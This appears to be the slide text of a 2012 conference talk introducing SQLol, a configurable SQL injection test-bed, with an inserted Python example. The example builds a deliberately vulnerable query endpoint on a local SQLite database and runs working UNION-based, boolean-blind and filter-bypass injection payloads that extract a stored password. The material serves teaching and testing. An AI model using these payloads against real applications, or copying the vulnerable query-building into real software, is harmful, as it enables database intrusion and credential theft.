The slides from my SOURCE Boston 2012 talk: Advanced SQL Injection with SQLol
COPYRIGHT TRUSTWAVE 2011
Advanced SQL Injection with SQLol
Presented by: Daniel Crowley
What?
SQLol: a configurable SQLi test-bed. A tool for:
Research
Education
Testing
http://github.com/SpiderLabs/SQLol
Why?
Existing test-beds are: inflexible, simplified
Real-world scenarios are: varied, dangerous
Why? (Klingon version)
Heghlu'meH QaQ jajvam (Klingon: "Today is a good day to die")
Why? (Shakespearean version)
I humbly posit that the current state
(With much respect to work which does precede)
Of test-beds made with vulns to demonstrate
Is lacking some in flexibility.
Two options are presented present-day,
As far as when one deals with SQL:
A blind injection (bool or time delay)
And UNION statement hax (oh gee, how swell...)
Imagine we could choose how queries read
And how our input sanitizes, oh!
How nimble and specific we could be
To recreate our 'sploit scenarios.
And thus is S-Q-L-O-L conceived:
That we can study how to pwn DBs.
Why? (tl;dr version)
'Cuz.
AIM: Selecting flaw configuration
Choose type of query
Choose sanitization options
Choose verbosity
Challenges
FIRE: Manual and automated exploitation
Manual
Automated
HOW ABOUT A DEMONSTRATION?
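The flaw-configuration and exploitation slides above are screenshots, so here is a small runnable stand-in for the idea they describe. This is an added example, not SQLol's own code (SQLol is PHP on ADODB; this uses Python and an in-memory SQLite database): a simulated endpoint with the three selectable axes the deck lists (query type, i.e. the injection context; sanitization option; verbosity), plus the two manual techniques from the verse slides, a UNION-based extraction and a boolean-blind extraction. All names, the `users` table and its rows, and the filter options `escape_quotes` and `strip_union` are constructed for this example and are not SQLol's configuration.

```python
import sqlite3
import string

# Constructed sample schema and rows for the simulation (not SQLol's own data).
SCHEMA = """
CREATE TABLE users (id INTEGER, username TEXT, password TEXT);
INSERT INTO users VALUES (1, 'admin', 's3cretpw9'), (2, 'bob', 'hunter2');
"""

def sanitize(value, mode):
    """Hypothetical sanitization options standing in for a selectable filter."""
    if mode == "none":
        return value
    if mode == "escape_quotes":        # double every single quote, SQL-style
        return value.replace("'", "''")
    if mode == "strip_union":          # naive, single-pass keyword removal
        return value.replace("UNION", "")
    raise ValueError(f"unknown sanitization mode {mode!r}")

def build_query(value, location):
    """Two injection contexts: inside a quoted string, or as a bare integer."""
    if location == "string":
        return f"SELECT username FROM users WHERE username = '{value}'"
    if location == "int":
        return f"SELECT username FROM users WHERE id = {value}"
    raise ValueError(f"unknown location {location!r}")

def vulnerable_app(user_input, location, sanitization, verbosity):
    """Simulated endpoint. 'full' echoes rows and DB errors; 'boolean' reveals
    only whether the query matched at least one row (a true/false oracle)."""
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    query = build_query(sanitize(user_input, sanitization), location)
    try:
        rows = [r[0] for r in db.execute(query).fetchall()]
        error = None
    except sqlite3.Error as e:
        rows, error = [], str(e)
    finally:
        db.close()
    if verbosity == "full":
        return {"rows": rows, "error": error}
    if verbosity == "boolean":
        return {"match": bool(rows)}
    raise ValueError(f"unknown verbosity {verbosity!r}")

# Quote-free subquery for the secret, so the int context survives escape_quotes.
TARGET = "(SELECT password FROM users WHERE id = 1)"

def union_attack(location, sanitization, union_kw="UNION"):
    """UNION-based extraction: needs the query output echoed back ('full').
    union_kw='UNIUNIONON' shows why single-pass keyword stripping is useless."""
    if location == "string":
        payload = f"x' {union_kw} SELECT {TARGET} -- "
    else:
        payload = f"0 {union_kw} SELECT {TARGET}"
    out = vulnerable_app(payload, location, sanitization, "full")
    return out["rows"][0] if out["rows"] else None

def boolean_blind_attack(location, sanitization, max_len=32):
    """Boolean-blind extraction: works with nothing but a true/false oracle.
    Recovers the secret one character at a time via unicode()/substr(),
    which keeps the payload quote-free in the int context."""
    charset = string.ascii_lowercase + string.digits
    recovered = ""
    for pos in range(1, max_len + 1):
        for c in charset:
            cond = f"unicode(substr({TARGET}, {pos}, 1)) = {ord(c)}"
            payload = f"admin' AND {cond} -- " if location == "string" else f"1 AND {cond}"
            if vulnerable_app(payload, location, sanitization, "boolean")["match"]:
                recovered += c
                break
        else:
            break  # no candidate matched: end of string, or the injection is blocked
    return recovered

if __name__ == "__main__":
    for loc in ("string", "int"):
        for san in ("none", "escape_quotes", "strip_union"):
            print(f"{loc:6} {san:14} union={union_attack(loc, san)!r:12} "
                  f"blind={boolean_blind_attack(loc, san)!r}")
    print("strip_union bypass:", union_attack("string", "strip_union", "UNIUNIONON"))
```

Running it shows the point of making the flaw configurable: quote escaping stops both techniques in the string context but neither in the integer context, the UNION filter stops the UNION attack (until the keyword is doubled up) but not the blind one, and dropping verbosity from `full` to `boolean` is exactly what forces the attacker from the fast UNION path onto the slow character-by-character path.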
MAKE THE MAGIC HAPPEN: Deploying SQLol
Requirements:
Web server of your choice with PHP
ADODB-supported database
Deployment:
Un-tar SQLol inside web root
Modify includes/database.config.php
Run database reset script
Future features:
Custom sanitization routines
Stored procedure injections
Database privilege options
More challenges
Like SQLol? Try XMLmao!
Possible future test beds?
cryptOMG
rofLDAP (asLDAP)
KTHXbypass
XSSmh
Questions?
Email: [email protected]
Twitter: @dan_crowley
Code: http://github.com/SpiderLabs/SQLol
Survey: http://www.surveymonkey.com/sourceboston12